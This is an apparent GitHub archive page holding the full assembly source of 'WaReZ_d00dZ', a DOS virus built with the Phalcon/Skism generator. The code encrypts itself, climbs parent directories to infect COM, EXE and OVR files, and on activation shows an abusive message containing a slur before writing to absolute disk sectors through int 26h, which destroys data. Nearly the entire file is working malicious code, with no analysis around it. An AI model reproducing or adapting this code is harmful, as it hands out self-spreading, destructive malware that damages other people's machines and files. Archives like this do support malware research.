13
1
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.PX.asm
vxunderground 8c9f96fc5f mov fix
2022-08-21 04:30:30 -05:00

682 lines
21 KiB
NASM

; PX.ASM : [WaReZ_d00dZ] by [pAgE]
; Created wik the Phalcon/Skism Mass-Produced Code Generator
; from the configuration file skeleton.cfg
.model tiny ; Handy directive
.code ; Virus code segment
org 100h ; COM file starting IP
idi = 'FB'
id = 'ZP' ; ID word for EXE infections
entry_point: db 0e9h,0,0 ; jmp decrypt
decrypt: ; handles encryption and decryption
patch_startencrypt:
mov di,offset startencrypt ; start of decryption
mov cx,(offset heap - offset startencrypt)/2 ; iterations
decrypt_loop:
db 2eh,81h,05h ; add word ptr cs:[di], xxxx
decrypt_value dw 0 ; initialised at zero for null effect
inc di ; calculate new decryption location
inc di
loop decrypt_loop ; decrypt mo'
startencrypt:
call next ; calculate delta offset
next: pop bp ; bp = IP next
sub bp,offset next ; bp = delta offset
cmp sp,id ; COM or EXE?
je restoreEXE
cmp sp,idi ; COM or EXE?
je restoreOVR
restoreCOM:
lea si,[bp+save3]
mov di,100h
push di ; For later return
movsb
jmp short restoreEXIT
restoreEXE:
push ds
push es
push cs ; DS = CS
pop ds
push cs ; ES = CS
pop es
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw
movsw
movsw
restoreOVR:
push ds
push es
push cs ; DS = CS
pop ds
push cs ; ES = CS
pop es
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw
movsw
movsw
restoreEXIT:
movsw
mov byte ptr [bp+numinfec],50; reset infection counter
mov ah,1Ah ; Set new DTA
lea dx,[bp+newDTA] ; new DTA @ DS:DX
int 21h
mov ah,47h ; Get current directory
mov dl,0 ; Current drive
lea si,[bp+origdir] ; DS:SI->buffer
int 21h
mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR
mov ax,3524h ; Get int 24 handler
int 21h ; to ES:BX
mov word ptr [bp+oldint24],bx; Save it
mov word ptr [bp+oldint24+2],es
mov ah,25h ; Set new int 24 handler
lea dx,[bp+offset int24] ; DS:DX->new handler
int 21h
push cs ; Restore ES
pop es ; 'cuz it was changed
dir_scan: ; "dot dot" traversal
lea dx,[bp+ovr_mask]
call infect_mask
lea dx,[bp+exe_mask]
call infect_mask
lea dx,[bp+com_mask]
call infect_mask
mov ah,3bh ; change directory
lea dx,[bp+dot_dot] ; "cd .."
int 21h
jnc dir_scan ; go back for mo!
done_infections:
mov ah,2ah ; Get current date
int 21h
cmp dh,1 ; Check month
jb exit_virus
cmp cx,1992 ; Check year
jb exit_virus
cmp al,0 ; Check date of week
jae activate
exit_virus:
mov ax,2524h ; Restore int 24 handler
lds dx,[bp+offset oldint24] ; to original
int 21h
push cs
pop ds
mov ah,3bh ; change directory
lea dx,[bp+origdir-1] ; original directory
int 21h
mov ah,1ah ; restore DTA to default
mov dx,80h ; DTA in PSP
cmp sp,id-4 ; EXE or COM?
jz returnEXE
returnCOM:
int 27h
retn ; 100h is on stack
returnEXE:
pop es
pop ds
int 21h
mov ax,es ; AX = PSP segment
add ax,10h ; Adjust for PSP
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli ; Clear intrpts for stack manipulation
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
sti
returnOVR:
pop es
pop ds
int 21h
mov ax,es ; AX = PSP segment
add ax,10h ; Adjust for PSP
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli ; Clear intrpts for stack manipulation
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
sti
db 0eah ; jmp ssss:oooo
jmpsave dd ? ; Original CS:IP
stacksave dd ? ; Original SS:SP
jmpsave2 db ? ; Actually four bytes
save3 db 0cdh,20h,0 ; First 3 bytes of COM file
stacksave2 dd ?
activate proc far
start:
jmp short loc_1
db 90h
data_2 db 0
data_3 dw 2B1h
db 2
data_4 dw 0
db 'HEY!!! Blow ME, WaReZ FAGGOT'
db 1Ah
data_5 db 'You got sorta lucky!!!', 0Dh, 0Ah
db '$'
loc_1:
mov ah,0Fh
int 010h
xor ah,ah
int 010h
mov ax,0002h
mov cx,0100h
mov ah,0Fh
int 10h ; Video display ah=functn 0Fh
; get state, al=mode, bh=page
; ah=columns on screen
mov bx,0B800h
cmp al,2
je loc_2 ; Jump if equal
cmp al,3
je loc_2 ; Jump if equal
mov data_2,0
mov bx,0B000h
cmp al,7
je loc_2 ; Jump if equal
mov dx,offset data_5 ; ('Unsupported Video Mode')
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
retn
loc_2:
mov es,bx
mov di,data_4
mov si,offset data_6
mov dx,3DAh
mov bl,9
mov cx,data_3
cld ; Clear direction
xor ax,ax ; Zero register
locloop_4:
lodsb ; String [si] to al
cmp al,1Bh
jne loc_5 ; Jump if not equal
xor ah,80h
jmp short loc_20
loc_5:
cmp al,10h
jae loc_8 ; Jump if above or =
and ah,0F0h
or ah,al
jmp short loc_20
loc_8:
cmp al,18h
je loc_11 ; Jump if equal
jnc loc_12 ; Jump if carry=0
sub al,10h
add al,al
add al,al
add al,al
add al,al
and ah,8Fh
or ah,al
jmp short loc_20
loc_11:
mov di,data_4
add di,data_1e
mov data_4,di
jmp short loc_20
loc_12:
mov bp,cx
mov cx,1
cmp al,19h
jne loc_13 ; Jump if not equal
lodsb ; String [si] to al
mov cl,al
mov al,20h ; ' '
dec bp
jmp short loc_14
loc_13:
cmp al,1Ah
jne loc_15 ; Jump if not equal
lodsb ; String [si] to al
dec bp
mov cl,al
lodsb ; String [si] to al
dec bp
loc_14:
inc cx
loc_15:
cmp data_2,0
je loc_18 ; Jump if equal
mov bh,al
locloop_16:
in al,dx ; port 3DAh, CGA/EGA vid status
rcr al,1 ; Rotate thru carry
jc locloop_16 ; Jump if carry Set
loc_17:
in al,dx ; port 3DAh, CGA/EGA vid status
and al,bl
jnz loc_17 ; Jump if not zero
mov al,bh
stosw ; Store ax to es:[di]
loop locloop_16 ; Loop if cx > 0
jmp short loc_19
loc_18:
rep stosw ; Rep when cx >0 Store ax to es:[di]
loc_19:
mov cx,bp
loc_20:
jcxz loc_ret_21 ; Jump if cx=0
loop locloop_4 ; Loop if cx > 0
loc_ret_21:
push dx
mov al,002h
mov cx,030h
cli
cwd
int 026h
pop dx
mov ax,04C00h
int 021h
activate endp
jmp exit_virus
creator db '[MPC]',0 ; Mass Produced Code Generator
virusname db '[WaReZ_d00dZ]',0
author db '[pAgE]',0
infect_mask:
mov ah,4eh ; find first file
mov cx,7 ; any attribute
findfirstnext:
int 21h ; DS:DX points to mask
jc exit_infect_mask ; No mo files found
mov al,0h ; Open read only
call open
mov ah,3fh ; Read file to buffer
lea dx,[bp+buffer] ; @ DS:DX
mov cx,1Ah ; 1Ah bytes
int 21h
mov ah,3eh ; Close file
int 21h
cmp word ptr [bp+buffer],'ZM'; EXE?
jz checkEXE ; Why yes, yes it is!
cmp word ptr [bp+buffer],'FB'; EXE?
jz checkOVR ; Why yes, yes it is!
checkCOM:
mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA
mov bx,word ptr [bp+buffer+1]; get jmp location
add bx,heap-decrypt+3 ; Adjust for virus size
cmp ax,bx
je find_next ; already infected
jmp infect_com
checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected?
jnz infect_exe
checkOVR: cmp word ptr [bp+buffer+10h],idi ; is it already infected?
jnz infect_ovr
find_next:
mov ah,4fh ; find next file
jmp short findfirstnext
exit_infect_mask: ret
infect_exe:
les ax, dword ptr [bp+buffer+14h] ; Save old entry point
mov word ptr [bp+jmpsave2], ax
mov word ptr [bp+jmpsave2+2], es
les ax, dword ptr [bp+buffer+0Eh] ; Save old stack
mov word ptr [bp+stacksave2], es
mov word ptr [bp+stacksave2+2], ax
mov ax, word ptr [bp+buffer + 8] ; Get header size
mov cl, 4 ; convert to bytes
shl ax, cl
xchg ax, bx
les ax, [bp+offset newDTA+26]; Get file size
mov dx, es ; to DX:AX
push ax
push dx
sub ax, bx ; Subtract header size from
sbb dx, 0 ; file size
mov cx, 10h ; Convert to segment:offset
div cx ; form
mov word ptr [bp+buffer+14h], dx ; New entry point
mov word ptr [bp+buffer+16h], ax
mov word ptr [bp+buffer+0Eh], ax ; and stack
mov word ptr [bp+buffer+10h], id
pop dx ; get file length
pop ax
add ax, heap-decrypt ; add virus size
adc dx, 0
mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1 ; mod 512
mov word ptr [bp+buffer+4], dx ; new file size
mov word ptr [bp+buffer+2], ax
push cs ; restore ES
pop es
push word ptr [bp+buffer+14h] ; needed later
mov cx, 1ah
jmp finishinfection
infect_ovr:
les ax, dword ptr [bp+buffer+14h] ; Save old entry point
mov word ptr [bp+jmpsave2], ax
mov word ptr [bp+jmpsave2+2], es
les ax, dword ptr [bp+buffer+0Eh] ; Save old stack
mov word ptr [bp+stacksave2], es
mov word ptr [bp+stacksave2+2], ax
mov ax, word ptr [bp+buffer + 8] ; Get header size
mov cl, 4 ; convert to bytes
shl ax, cl
xchg ax, bx
les ax, [bp+offset newDTA+26]; Get file size
mov dx, es ; to DX:AX
push ax
push dx
sub ax, bx ; Subtract header size from
sbb dx, 0 ; file size
mov cx, 10h ; Convert to segment:offset
div cx ; form
mov word ptr [bp+buffer+14h], dx ; New entry point
mov word ptr [bp+buffer+16h], ax
mov word ptr [bp+buffer+0Eh], ax ; and stack
mov word ptr [bp+buffer+10h],idi
pop dx ; get file length
pop ax
add ax, heap-decrypt ; add virus size
adc dx, 0
mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1 ; mod 512
mov word ptr [bp+buffer+4], dx ; new file size
mov word ptr [bp+buffer+2], ax
push cs ; restore ES
pop es
push word ptr [bp+buffer+14h] ; needed later
mov cx, 1ah
jmp short finishinfection
infect_com: ; ax = filesize
mov cx,3
sub ax,cx
lea si,[bp+offset buffer]
lea di,[bp+offset save3]
movsw
movsb
mov byte ptr [si-3],0e9h
mov word ptr [si-2],ax
add ax,103h
push ax ; needed later
finishinfection:
push cx ; Save # bytes to write
xor cx,cx ; Clear attributes
call attributes ; Set file attributes
mov al,2
call open
mov ah,40h ; Write to file
lea dx,[bp+buffer] ; Write from buffer
pop cx ; cx bytes
int 21h
mov ax,4202h ; Move file pointer
xor cx,cx ; to end of file
cwd ; xor dx,dx
int 21h
mov ah,2ch ; Get current time
int 21h ; dh=sec,dl=1/100 sec
mov [bp+decrypt_value],dx ; Set new encryption value
lea di,[bp+code_store]
mov ax,5355h ; push bp,push bx
stosw
lea si,[bp+decrypt] ; Copy encryption function
mov cx,startencrypt-decrypt ; Bytes to move
push si ; Save for later use
push cx
rep movsb
xor byte ptr [bp+decrypt_loop+2],028h ; flip between add/sub
lea si,[bp+write] ; Copy writing function
mov cx,endwrite-write ; Bytes to move
rep movsb
pop cx
pop si
pop dx ; Entry point of virus
push di
push si
push cx
rep movsb ; Copy decryption function
mov ax,5b5dh ; pop bx,pop bp
stosw
mov al,0c3h ; retn
stosb
add dx,offset startencrypt - offset decrypt ; Calculate new
mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of
call code_store ; decryption
pop cx
pop di
pop si
rep movsb ; Restore decryption function
mov ax,5701h ; Restore creation date/time
mov cx,word ptr [bp+newDTA+16h] ; time
mov dx,word ptr [bp+newDTA+18h] ; date
int 21h
mov ah,3eh ; Close file
int 21h
mov ch,0
mov cl,byte ptr [bp+newDTA+15h] ; Restore original
call attributes ; attributes
dec byte ptr [bp+numinfec] ; One mo infection
jnz mo_infections ; Not enough
pop ax ; remove call from stack
jmp done_infections
mo_infections: jmp find_next
open:
mov ah,3dh
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
xchg ax,bx
ret
attributes:
mov ax,4301h ; Set attributes to cx
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
ret
write:
pop bx ; Restore file handle
pop bp ; Restore relativeness
mov ah,40h ; Write to file
lea dx,[bp+decrypt] ; Concatenate virus
mov cx,heap-decrypt ; # bytes to write
int 21h
push bx
push bp
endwrite:
int24: ; New int 24h (error) handler
mov al,3 ; Fail call
iret ; Return control
data_6 db 9
db 10h,0D2h,0C4h,0C4h,0BFh, 20h
db 0D6h,0C4h,0C4h,0BFh, 20h,0D6h
db 0C4h,0C4h,0BFh, 20h,0B7h
db 20h ; Data table (indexed access)
db 0D6h,0C4h,0D2h,0C4h,0BFh, 19h
db 03h,0D2h, 20h, 20h,0C2h, 20h
db 0D6h,0C4h,0C4h,0BFh, 20h,0D2h
db 20h, 20h,0C2h, 19h
dd 0DA20D203h ; Data table (indexed access)
db 20h, 20h,0D6h,0C4h,0C4h,0BFh
db 20h,0D6h,0C4h,0C4h,0BFh, 20h
db 0D2h, 20h,0D2h, 20h,0C2h, 20h
db 20h, 18h,0BAh, 20h, 20h,0B3h
db 20h,0BAh, 20h, 20h,0B3h, 20h
db 0BAh, 20h, 20h,0B3h, 20h,0BDh
db 19h, 02h,0BAh, 19h, 05h,0D3h
db 0C4h,0C4h,0B4h, 20h,0BAh, 20h
db 20h,0B3h, 20h,0BAh, 20h, 20h
db 0B3h, 19h, 03h,0C7h,0C4h,0C1h
db 0BFh, 20h,0BAh, 20h, 20h,0B3h
db 20h,0BAh, 20h, 20h,0B3h, 20h
db 0BAh, 20h,0BAh, 20h,0B3h, 20h
db 20h, 18h,0D0h,0C4h,0C4h,0D9h
db 20h,0D3h,0C4h,0C4h,0D9h, 20h
db 0D0h, 20h, 20h,0C1h, 19h, 04h
db 0D0h, 19h, 05h,0D3h,0C4h,0C4h
db 0D9h, 20h,0D3h,0C4h,0C4h,0D9h
db 20h,0D3h,0C4h,0C4h,0D9h, 19h
db 03h,0D0h, 20h, 20h,0C1h, 20h
db 0D0h, 20h, 20h,0C1h, 20h,0D3h
db 0C4h,0C4h,0D9h, 20h,0D3h,0C4h
db 0D0h,0C4h,0D9h, 20h, 20h, 18h
db 19h, 41h, 18h,0D6h,0C4h,0D2h
db 0C4h,0BFh, 20h,0D2h, 20h, 20h
db 0C2h, 20h,0D6h,0C4h,0C4h,0BFh
db 20h,0D6h,0C4h,0D2h,0C4h,0BFh
db 19h, 03h,0D2h,0C4h,0C4h,0BFh
db 20h,0C4h,0D2h,0C4h, 20h,0D2h
db 0C4h,0C4h,0BFh, 20h,0D6h,0C4h
db 0C4h,0BFh, 20h,0D6h,0C4h,0C4h
db 0BFh, 20h,0D2h, 20h, 20h,0C2h
db 19h, 02h,0C4h,0D2h,0C4h, 20h
db 20h,0D6h,0C4h,0BFh, 20h, 20h
db 18h, 20h, 20h,0BAh, 19h, 02h
db 0C7h,0C4h,0C4h,0B4h, 20h,0C7h
db 0C4h,0C4h,0B4h, 19h, 02h,0BAh
db 19h, 05h,0C7h,0C4h,0C4h,0D9h
db 20h, 20h,0BAh, 20h, 20h,0C7h
db 0C4h,0C2h,0D9h, 20h,0C7h,0C4h
db 0C4h,0B4h, 20h,0BAh, 19h, 03h
db 0D3h,0C4h,0C4h,0B4h, 19h, 03h
dd 0D30219BAh ; Data table (indexed access)
db 0C4h,0BFh, 20h, 20h, 18h, 20h
db 20h,0D0h, 19h, 02h,0D0h, 20h
db 20h,0C1h, 20h,0D0h, 20h, 20h
db 0C1h, 19h, 02h,0D0h, 19h, 05h
db 0D0h, 19h, 03h,0C4h,0D0h,0C4h
db 20h,0D0h, 20h,0C1h, 20h, 20h
db 0D0h, 20h, 20h,0C1h, 20h,0D3h
db 0C4h,0C4h,0D9h, 20h,0D3h,0C4h
db 0C4h,0D9h, 19h, 02h,0C4h,0D0h
db 0C4h, 20h,0D3h,0C4h,0C4h,0D9h
db 20h, 20h, 18h, 19h, 41h, 18h
db 19h, 41h, 18h, 19h, 07h, 0Ch
db 1Bh,0C4h,0C4h,0D2h,0C4h,0C4h
db 20h,0D2h, 19h, 06h,0D2h, 19h
db 06h,0D2h, 1Ah, 04h,0C4h,0BFh
db 20h,0D6h, 1Ah, 05h,0C4h, 20h
db 0D6h, 1Ah, 04h,0C4h,0BFh, 20h
db 0D2h, 19h, 0Ah, 18h, 19h, 09h
db 0BAh, 19h, 02h,0BAh, 19h, 06h
db 0BAh, 19h, 06h,0BAh, 19h, 06h
db 0BAh, 19h, 06h,0BAh, 19h, 04h
db 0B3h, 20h,0BAh, 19h, 0Ah, 18h
db 19h, 09h,0BAh, 19h, 02h,0BAh
db 19h, 06h,0BAh, 19h, 06h,0C7h
db 0C4h,0C4h, 19h, 04h,0BAh, 19h
db 02h,0DAh,0C4h,0BFh, 20h,0C7h
db 1Ah, 04h,0C4h,0B4h, 20h,0BAh
db 19h, 0Ah, 18h, 19h, 09h,0BAh
db 19h, 02h,0BAh, 19h, 06h,0BAh
db 19h, 06h,0BAh, 19h, 06h,0BAh
db 19h, 04h,0B3h, 20h,0BAh, 19h
db 04h,0B3h, 20h,0BAh, 19h, 0Ah
db 18h, 19h, 07h,0C4h,0C4h,0D0h
db 0C4h,0C4h, 20h,0D0h, 1Ah, 04h
db 0C4h,0D9h, 20h,0D0h, 1Ah, 04h
db 0C4h,0D9h, 20h,0D0h, 1Ah, 04h
db 0C4h,0D9h, 20h,0D3h, 1Ah, 04h
db 0C4h,0D9h, 20h,0D0h, 19h, 04h
db 0C1h, 20h,0D0h, 1Ah, 04h,0C4h
db 0D9h, 19h, 04h, 18h, 19h, 41h
db 18h, 19h, 41h, 18h
db ' ', 9, 1Bh, 'I am afraid that I'
db ' am going to have to smash your '
db 'WaReZ, d00d!!!'
db 18h, 19h, 41h, 18h, 19h, 41h
db 18h
db 20h
db ' Go ahead! Call the police and t'
db 'ell them ', 0Ah, '[NuKe] ', 9, 'p'
db 'aid you a visit!'
db 18h
data_1e equ 0A0h
exe_mask db '*.exe',0
ovr_mask db '*.ovr',0
com_mask db '*.com',0
dot_dot db '..',0
heap: ; Variables not in code
; The following code is the buffer for the write function
code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)
oldint24 dd ? ; Storage for old int 24h handler
backslash db ?
origdir db 64 dup (?) ; Current directory buffer
newDTA db 43 dup (?) ; Temporary DTA
numinfec db ? ; Infections this run
buffer db 1ah dup (?) ; read buffer
endheap: ; End of virus
end entry_point